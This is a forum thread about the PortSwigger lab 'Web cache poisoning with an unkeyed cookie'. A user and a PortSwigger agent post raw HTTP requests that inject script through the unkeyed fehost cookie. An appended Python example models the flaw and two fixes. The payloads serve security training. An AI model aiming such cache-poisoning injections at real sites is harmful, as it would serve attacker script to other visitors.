Burp Suite User Forum


PortSwigger Lab: Web cache poisoning with an unkeyed cookie

Luke | Last updated: Feb 27, 2024 01:05PM UTC

Having the same issue with Webcache Poisoning - unkeyed cookie. Have managed to trigger the pop up on the site whenever a viewer loads homepage, but the automated user who is supposed to visit the site never does. Not sure if there is something wrong with my payload? I resend the payload every 25s, which is within the 30s timeout window.

Payload:

    GET / HTTP/2
    Host: 0a8600920336c1ba81d202dc00f7001d.web-security-academy.net
    Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Priority: u=0, i
    Cookie: session=91bXxXhkel77jGsDWF58KtsqVPZTOVGl; fehost=asdf%22%2dalert(1)%2d%22;

Dominyque, PortSwigger Agent | Last updated: Feb 27, 2024 02:01PM UTC

Hi Luke,

I have just tested the lab and can confirm that it works as it should.

Have you tried following the community solution video for further guidance?

Following the solution video gives you a payload like this, and sending this request until your response gets an X-Cache: hit solves the lab:

    GET / HTTP/2
    Host: 0acd00b10337c8dc80bd3f5e006f00e5.web-security-academy.net
    Cookie: session=Aq8clLU3mzbzTSvoURXAzJvBGaFHT3N9; fehost=helloHacker"-alert(1)-"helloHacker
    Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "macOS"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://0acd00b10337c8dc80bd3f5e006f00e5.web-security-academy.net/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Priority: u=0, i
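Added example, not part of the thread or of PortSwigger's lab code: a self-contained model of why a cookie left out of the cache key is a problem, next to two mitigations (keying on the cookie, and encoding the reflected value). The origin's reflection into an inline script, the default value `prod`, and all function and class names are assumptions; the 30-second lifetime and the `fehost` cookie name come from the posts above.

```python
import json

TTL = 30  # seconds, the cache lifetime mentioned in the thread
MARKER = 'x"-marker-"x'  # constructed, inert stand-in for a cookie value


def render(cookies, encode):
    """Hypothetical origin: reflects the fehost cookie into an inline script."""
    fehost = cookies.get("fehost", "prod")
    if encode:
        # JSON-escape quotes and backslashes, and keep "<" out of the script body.
        fehost = json.dumps(fehost)[1:-1].replace("<", "\\u003c")
    return '<script>data = {"frontend":"%s"}</script>' % fehost


class Cache:
    """Toy cache keyed on the path plus any cookies named in key_cookies."""

    def __init__(self, key_cookies=()):
        self.key_cookies = key_cookies
        self.store = {}

    def get(self, path, cookies, now, encode=False):
        key = (path,) + tuple(cookies.get(c) for c in self.key_cookies)
        entry = self.store.get(key)
        if entry and now - entry[0] < TTL:
            return entry[1], "hit"
        body = render(cookies, encode)
        self.store[key] = (now, body)
        return body, "miss"


def second_client_view(cache, encode=False):
    """Client A sends a fehost cookie at t=0; client B sends none at t=10."""
    cache.get("/", {"fehost": MARKER}, now=0, encode=encode)
    return cache.get("/", {}, now=10, encode=encode)


if __name__ == "__main__":
    for label, cache, enc in [
        ("cookie unkeyed", Cache(), False),
        ("cookie in cache key", Cache(key_cookies=("fehost",)), False),
        ("unkeyed, value encoded", Cache(), True),
    ]:
        print(label, "->", second_client_view(cache, enc))
```

In the third case the second client still receives a response built from another client's cookie, but the value stays inside the string literal; only keying on the cookie (or not caching responses that depend on it) stops the cross-client leak itself.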
